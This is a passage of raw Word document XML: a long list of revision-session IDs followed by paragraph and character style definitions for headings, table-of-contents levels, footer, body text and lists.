    <w:rsid w:val="00A45526"/>
    <w:rsid w:val="00A47FD6"/>
    <w:rsid w:val="00A504B5"/>
    <w:rsid w:val="00A5232E"/>
    <w:rsid w:val="00A523E3"/>
    <w:rsid w:val="00A569C2"/>
    <w:rsid w:val="00A57960"/>
    <w:rsid w:val="00A609B5"/>
    <w:rsid w:val="00A63F3C"/>
    <w:rsid w:val="00A649C2"/>
    <w:rsid w:val="00A70F8A"/>
    <w:rsid w:val="00A773A3"/>
    <w:rsid w:val="00A8333B"/>
    <w:rsid w:val="00A870D2"/>
    <w:rsid w:val="00A8787C"/>
    <w:rsid w:val="00A917EC"/>
    <w:rsid w:val="00A96DFF"/>
    <w:rsid w:val="00A96EA6"/>
    <w:rsid w:val="00AA01F8"/>
    <w:rsid w:val="00AA1F62"/>
    <w:rsid w:val="00AA38CD"/>
    <w:rsid w:val="00AA446C"/>
    <w:rsid w:val="00AA6E44"/>
    <w:rsid w:val="00AA7A9A"/>
    <w:rsid w:val="00AB1A0C"/>
    <w:rsid w:val="00AB41AE"/>
    <w:rsid w:val="00AB623F"/>
    <w:rsid w:val="00AC0136"/>
    <w:rsid w:val="00AC2A7A"/>
    <w:rsid w:val="00AC2F30"/>
    <w:rsid w:val="00AC658F"/>
    <w:rsid w:val="00AC6E55"/>
    <w:rsid w:val="00AC724C"/>
    <w:rsid w:val="00AC77DC"/>
    <w:rsid w:val="00AE0567"/>
    <w:rsid w:val="00AE60EE"/>
    <w:rsid w:val="00AF0E36"/>
    <w:rsid w:val="00AF0FB5"/>
    <w:rsid w:val="00AF2408"/>
    <w:rsid w:val="00AF324B"/>
    <w:rsid w:val="00B00B1D"/>
    <w:rsid w:val="00B03755"/>
    <w:rsid w:val="00B045D3"/>
    <w:rsid w:val="00B05B58"/>
    <w:rsid w:val="00B06115"/>
    <w:rsid w:val="00B07614"/>
    <w:rsid w:val="00B078F3"/>
    <w:rsid w:val="00B10DD1"/>
    <w:rsid w:val="00B12394"/>
    <w:rsid w:val="00B146E3"/>
    <w:rsid w:val="00B1584A"/>
    <w:rsid w:val="00B30421"/>
    <w:rsid w:val="00B30606"/>
    <w:rsid w:val="00B321C9"/>
    <w:rsid w:val="00B37488"/>
    <w:rsid w:val="00B376D7"/>
    <w:rsid w:val="00B37AAD"/>
    <w:rsid w:val="00B432E1"/>
    <w:rsid w:val="00B44AC0"/>
    <w:rsid w:val="00B45481"/>
    <w:rsid w:val="00B45AF6"/>
    <w:rsid w:val="00B54FD2"/>
    <w:rsid w:val="00B552CC"/>
    <w:rsid w:val="00B56AEF"/>
    <w:rsid w:val="00B64366"/>
    <w:rsid w:val="00B71743"/>
    <w:rsid w:val="00B7188B"/>
    <w:rsid w:val="00B75546"/>
    <w:rsid w:val="00B75ABE"/>
    <w:rsid w:val="00B83E44"/>
    <w:rsid w:val="00B860FF"/>
    <w:rsid w:val="00B91C42"/>
    <w:rsid w:val="00B93BA9"/>
    <w:rsid w:val="00B94EAD"/>
    <w:rsid w:val="00B95782"/>
    <w:rsid w:val="00B97794"/>
    <w:rsid w:val="00BA4035"/>
    <w:rsid w:val="00BB1CB4"/>
    <w:rsid w:val="00BB3099"/>
    <w:rsid w:val="00BB4DF3"/>
    <w:rsid w:val="00BC029F"/>
    <w:rsid w:val="00BC0A66"/>
    <w:rsid w:val="00BC1DF5"/>
    <w:rsid w:val="00BC2F49"/>
    <w:rsid w:val="00BD014F"/>
    <w:rsid w:val="00BD227C"/>
    <w:rsid w:val="00BD4EFF"/>
    <w:rsid w:val="00BD5A1C"/>
    <w:rsid w:val="00BD67C9"/>
    <w:rsid w:val="00BD7C2D"/>
    <w:rsid w:val="00BE025F"/>
    <w:rsid w:val="00BE43B2"/>
    <w:rsid w:val="00BE6908"/>
    <w:rsid w:val="00BF081D"/>
    <w:rsid w:val="00BF0EAE"/>
    <w:rsid w:val="00BF28BB"/>
    <w:rsid w:val="00BF2FD3"/>
    <w:rsid w:val="00BF4A22"/>
    <w:rsid w:val="00BF4A69"/>
    <w:rsid w:val="00BF562A"/>
    <w:rsid w:val="00C0154A"/>
    <w:rsid w:val="00C12582"/>
    <w:rsid w:val="00C12C7B"/>
    <w:rsid w:val="00C1434E"/>
    <w:rsid w:val="00C20104"/>
    <w:rsid w:val="00C24677"/>
    <w:rsid w:val="00C27002"/>
    <w:rsid w:val="00C27FF3"/>
    <w:rsid w:val="00C32FB8"/>
    <w:rsid w:val="00C333FD"/>
    <w:rsid w:val="00C35D1B"/>
    <w:rsid w:val="00C3605F"/>
    <w:rsid w:val="00C44B33"/>
    <w:rsid w:val="00C44F96"/>
    <w:rsid w:val="00C50852"/>
    <w:rsid w:val="00C50A42"/>
    <w:rsid w:val="00C50EE3"/>
    <w:rsid w:val="00C515C1"/>
    <w:rsid w:val="00C51A52"/>
    <w:rsid w:val="00C5433B"/>
    <w:rsid w:val="00C56AA0"/>
    <w:rsid w:val="00C60704"/>
    <w:rsid w:val="00C62419"/>
    <w:rsid w:val="00C70F92"/>
    <w:rsid w:val="00C71337"/>
    <w:rsid w:val="00C71391"/>
    <w:rsid w:val="00C71972"/>
    <w:rsid w:val="00C72C88"/>
    <w:rsid w:val="00C740C2"/>
    <w:rsid w:val="00C758D2"/>
    <w:rsid w:val="00C76E25"/>
    <w:rsid w:val="00C77ED8"/>
    <w:rsid w:val="00C805D7"/>
    <w:rsid w:val="00C81E12"/>
    <w:rsid w:val="00C823AA"/>
    <w:rsid w:val="00C84AE9"/>
    <w:rsid w:val="00C84CF4"/>
    <w:rsid w:val="00C8582F"/>
    <w:rsid w:val="00C86263"/>
    <w:rsid w:val="00C90364"/>
    <w:rsid w:val="00C90C4A"/>
    <w:rsid w:val="00C9100E"/>
    <w:rsid w:val="00CA0623"/>
    <w:rsid w:val="00CA1256"/>
    <w:rsid w:val="00CA207A"/>
    <w:rsid w:val="00CA292F"/>
    <w:rsid w:val="00CB1EF7"/>
    <w:rsid w:val="00CB473C"/>
    <w:rsid w:val="00CB51D2"/>
    <w:rsid w:val="00CC0420"/>
    <w:rsid w:val="00CC1661"/>
    <w:rsid w:val="00CC3C02"/>
    <w:rsid w:val="00CC3C53"/>
    <w:rsid w:val="00CC3F08"/>
    <w:rsid w:val="00CD01F7"/>
    <w:rsid w:val="00CD0D6F"/>
    <w:rsid w:val="00CD0ED6"/>
    <w:rsid w:val="00CD2934"/>
    <w:rsid w:val="00CD451B"/>
    <w:rsid w:val="00CD5D42"/>
    <w:rsid w:val="00CD6FD6"/>
    <w:rsid w:val="00CD7D8F"/>
    <w:rsid w:val="00CE03C2"/>
    <w:rsid w:val="00CE220C"/>
    <w:rsid w:val="00CE2E4F"/>
    <w:rsid w:val="00CE4D03"/>
    <w:rsid w:val="00CE6E18"/>
    <w:rsid w:val="00CF139B"/>
    <w:rsid w:val="00CF3CBF"/>
    <w:rsid w:val="00CF42F2"/>
    <w:rsid w:val="00CF4C3D"/>
    <w:rsid w:val="00CF587A"/>
    <w:rsid w:val="00D00C59"/>
    <w:rsid w:val="00D034E2"/>
    <w:rsid w:val="00D04963"/>
    <w:rsid w:val="00D05B01"/>
    <w:rsid w:val="00D06270"/>
    <w:rsid w:val="00D06F5D"/>
    <w:rsid w:val="00D147CB"/>
    <w:rsid w:val="00D16C7A"/>
    <w:rsid w:val="00D22615"/>
    <w:rsid w:val="00D23597"/>
    <w:rsid w:val="00D2359B"/>
    <w:rsid w:val="00D23700"/>
    <w:rsid w:val="00D24404"/>
    <w:rsid w:val="00D244CB"/>
    <w:rsid w:val="00D309CF"/>
    <w:rsid w:val="00D328E7"/>
    <w:rsid w:val="00D34E89"/>
    <w:rsid w:val="00D447E0"/>
    <w:rsid w:val="00D503AC"/>
    <w:rsid w:val="00D5112C"/>
    <w:rsid w:val="00D55E8F"/>
    <w:rsid w:val="00D575F5"/>
    <w:rsid w:val="00D5767B"/>
    <w:rsid w:val="00D57F11"/>
    <w:rsid w:val="00D60BE0"/>
    <w:rsid w:val="00D64428"/>
    <w:rsid w:val="00D6613D"/>
    <w:rsid w:val="00D67DC9"/>
    <w:rsid w:val="00D754EE"/>
    <w:rsid w:val="00D75D8A"/>
    <w:rsid w:val="00D75E31"/>
    <w:rsid w:val="00D766FC"/>
    <w:rsid w:val="00D77B6C"/>
    <w:rsid w:val="00D84692"/>
    <w:rsid w:val="00D8707D"/>
    <w:rsid w:val="00D915CD"/>
    <w:rsid w:val="00D933D2"/>
    <w:rsid w:val="00D9447A"/>
    <w:rsid w:val="00D95E46"/>
    <w:rsid w:val="00D9768E"/>
    <w:rsid w:val="00DA0621"/>
    <w:rsid w:val="00DA2EB4"/>
    <w:rsid w:val="00DA4353"/>
    <w:rsid w:val="00DA5B32"/>
    <w:rsid w:val="00DB311D"/>
    <w:rsid w:val="00DB32FC"/>
    <w:rsid w:val="00DB405A"/>
    <w:rsid w:val="00DB565D"/>
    <w:rsid w:val="00DB57F4"/>
    <w:rsid w:val="00DC663C"/>
    <w:rsid w:val="00DD0EB2"/>
    <w:rsid w:val="00DD67BD"/>
    <w:rsid w:val="00DE1084"/>
    <w:rsid w:val="00DE3E2B"/>
    <w:rsid w:val="00DE5BE5"/>
    <w:rsid w:val="00DE7368"/>
    <w:rsid w:val="00DF1C77"/>
    <w:rsid w:val="00DF2641"/>
    <w:rsid w:val="00DF75ED"/>
    <w:rsid w:val="00E119FF"/>
    <w:rsid w:val="00E11FF5"/>
    <w:rsid w:val="00E14A2A"/>
    <w:rsid w:val="00E15B31"/>
    <w:rsid w:val="00E220CD"/>
    <w:rsid w:val="00E23002"/>
    <w:rsid w:val="00E27037"/>
    <w:rsid w:val="00E318AC"/>
    <w:rsid w:val="00E319F5"/>
    <w:rsid w:val="00E32FCE"/>
    <w:rsid w:val="00E33FEF"/>
    <w:rsid w:val="00E3420D"/>
    <w:rsid w:val="00E3461E"/>
    <w:rsid w:val="00E34A57"/>
    <w:rsid w:val="00E41C75"/>
    <w:rsid w:val="00E4211D"/>
    <w:rsid w:val="00E438CA"/>
    <w:rsid w:val="00E44BF6"/>
    <w:rsid w:val="00E5361F"/>
    <w:rsid w:val="00E549E6"/>
    <w:rsid w:val="00E60276"/>
    <w:rsid w:val="00E602E2"/>
    <w:rsid w:val="00E61FC6"/>
    <w:rsid w:val="00E63B33"/>
    <w:rsid w:val="00E63C36"/>
    <w:rsid w:val="00E65640"/>
    <w:rsid w:val="00E707D0"/>
    <w:rsid w:val="00E719D1"/>
    <w:rsid w:val="00E71A68"/>
    <w:rsid w:val="00E72887"/>
    <w:rsid w:val="00E73B1E"/>
    <w:rsid w:val="00E823CC"/>
    <w:rsid w:val="00E82691"/>
    <w:rsid w:val="00E83630"/>
    <w:rsid w:val="00E84025"/>
    <w:rsid w:val="00E86B59"/>
    <w:rsid w:val="00E870E9"/>
    <w:rsid w:val="00E91A94"/>
    <w:rsid w:val="00EA584F"/>
    <w:rsid w:val="00EB5E9C"/>
    <w:rsid w:val="00EB6477"/>
    <w:rsid w:val="00EB760B"/>
    <w:rsid w:val="00EB7F96"/>
    <w:rsid w:val="00EC1304"/>
    <w:rsid w:val="00EC1B21"/>
    <w:rsid w:val="00EC2838"/>
    <w:rsid w:val="00EC368D"/>
    <w:rsid w:val="00EC396D"/>
    <w:rsid w:val="00EC3F22"/>
    <w:rsid w:val="00EC4951"/>
    <w:rsid w:val="00EC7664"/>
    <w:rsid w:val="00ED15B0"/>
    <w:rsid w:val="00ED1927"/>
    <w:rsid w:val="00ED2947"/>
    <w:rsid w:val="00ED2A02"/>
    <w:rsid w:val="00ED448A"/>
    <w:rsid w:val="00EE1044"/>
    <w:rsid w:val="00EE1859"/>
    <w:rsid w:val="00EE245D"/>
    <w:rsid w:val="00EE338E"/>
    <w:rsid w:val="00EE68D8"/>
    <w:rsid w:val="00EE7333"/>
    <w:rsid w:val="00EE7B00"/>
    <w:rsid w:val="00EF2B3E"/>
    <w:rsid w:val="00EF5807"/>
    <w:rsid w:val="00EF6508"/>
    <w:rsid w:val="00EF7971"/>
    <w:rsid w:val="00F022C6"/>
    <w:rsid w:val="00F02CEA"/>
    <w:rsid w:val="00F059E8"/>
    <w:rsid w:val="00F07368"/>
    <w:rsid w:val="00F110BF"/>
    <w:rsid w:val="00F12C2B"/>
    <w:rsid w:val="00F15437"/>
    <w:rsid w:val="00F1680C"/>
    <w:rsid w:val="00F2142B"/>
    <w:rsid w:val="00F221A1"/>
    <w:rsid w:val="00F221CC"/>
    <w:rsid w:val="00F2514D"/>
    <w:rsid w:val="00F276F8"/>
    <w:rsid w:val="00F34A8F"/>
    <w:rsid w:val="00F427B7"/>
    <w:rsid w:val="00F450CC"/>
    <w:rsid w:val="00F51666"/>
    <w:rsid w:val="00F539A9"/>
    <w:rsid w:val="00F54594"/>
    <w:rsid w:val="00F556E2"/>
    <w:rsid w:val="00F62B94"/>
    <w:rsid w:val="00F67113"/>
    <w:rsid w:val="00F75BCC"/>
    <w:rsid w:val="00F76E9C"/>
    <w:rsid w:val="00F82965"/>
    <w:rsid w:val="00F84462"/>
    <w:rsid w:val="00F84F3A"/>
    <w:rsid w:val="00F855BC"/>
    <w:rsid w:val="00F90076"/>
    <w:rsid w:val="00F90A71"/>
    <w:rsid w:val="00F90BE4"/>
    <w:rsid w:val="00F95711"/>
    <w:rsid w:val="00F959E5"/>
    <w:rsid w:val="00FA1AD3"/>
    <w:rsid w:val="00FA2235"/>
    <w:rsid w:val="00FA40C5"/>
    <w:rsid w:val="00FA7074"/>
    <w:rsid w:val="00FB3FC0"/>
    <w:rsid w:val="00FB675E"/>
    <w:rsid w:val="00FC05EE"/>
    <w:rsid w:val="00FC1F41"/>
    <w:rsid w:val="00FC6059"/>
    <w:rsid w:val="00FD0313"/>
    <w:rsid w:val="00FD2818"/>
    <w:rsid w:val="00FD33C0"/>
    <w:rsid w:val="00FD37BF"/>
    <w:rsid w:val="00FD69F6"/>
    <w:rsid w:val="00FE04DA"/>
    <w:rsid w:val="00FE2690"/>
    <w:rsid w:val="00FE452D"/>
    <w:rsid w:val="00FE4B34"/>
    <w:rsid w:val="00FF1EBB"/>
    <w:rsid w:val="00FF2825"/>
    <w:rsid w:val="00FF331F"/>
    <w:rsid w:val="00FF4EF1"/>
    <w:rsid w:val="00FF7274"/>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C04D6"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F92AE9B4-ED34-4442-AE8E-101E9495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autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00FA2235"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="TimesNewRomanPS-ItalicMT" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="32"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="00495E7A"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="90"/>
      </w:tabs>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="TimesNewRomanPS-ItalicMT" w:hAnsi="Times New Roman" w:cs="Arial"/>
      <w:bCs/>
      <w:iCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="002073D3"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:noProof/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="0067698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67698F"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="0067698F"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="0067698F"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="0067698F"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>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4CF4"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00C84CF4"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4320"/>
        <w:tab w:val="right" w:pos="8640"/>
      </w:tabs>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="PageNumber">
    <w:name w:val="page number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00C84CF4"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00C9100E"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Char">
    <w:name w:val="Char"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="0088135D"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="numbering" w:styleId="111111">
    <w:name w:val="Outline List 2"/>
    <w:basedOn w:val="NoList"/>
    <w:rsid w:val="001B13FA"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:rsid w:val="0088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23E3"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4320"/>
        <w:tab w:val="right" w:pos="8640"/>
      </w:tabs>
    </w:pPr>
    <w:rPr>
      <w:lang w:val="x-none" w:eastAsia="x-none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:semiHidden/>
    <w:rsid w:val="00A42F73"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:rsid w:val="00AC2A7A"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1920"/>
        <w:tab w:val="right" w:leader="dot" w:pos="8778"/>
      </w:tabs>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:noProof/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="fr-FR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="008424DD"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9090"/>
      </w:tabs>
      <w:spacing w:after="200"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="TimesNewRomanPS-BoldMT" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:noProof/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00332B32"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9061"/>
      </w:tabs>
      <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman"/>
      <w:noProof/>
      <w:sz w:val="28"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00AC2A7A"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
      <w:ind w:left="440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00AC2A7A"/>
    <w:rPr>
      <w:rFonts w:ascii="VNI-Times" w:hAnsi="VNI-Times"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextIndent3">
    <w:name w:val="Body Text Indent 3"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextIndent3Char"/>
    <w:rsid w:val="00142069"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:left="360"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:val="x-none" w:eastAsia="x-none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextIndent3Char">
    <w:name w:val="Body Text Indent 3 Char"/>
    <w:link w:val="BodyTextIndent3"/>
    <w:rsid w:val="00142069"/>
    <w:rPr>
      <w:rFonts w:ascii="VNI-Times" w:hAnsi="VNI-Times"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00142069"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00142069"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="LineNumber">
    <w:name w:val="line number"/>
    <w:rsid w:val="00BB1CB4"/>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:rsid w:val="006046D1"/>
    <w:rPr>
      <w:color w:val="954F72"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="008D478C"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00F76E9C"/>
    <w:rPr>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00403753"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007E1A2F"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00495E7A"/>
    <w:rPr>
      <w:rFonts w:eastAsia="TimesNewRomanPS-ItalicMT"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="32"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0049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95E7A"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="simple-translate-result">
    <w:name w:val="simple-translate-result"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00F12C2B"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hgkelc">
    <w:name w:val="hgkelc"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="007056C2"/>
  </w:style>
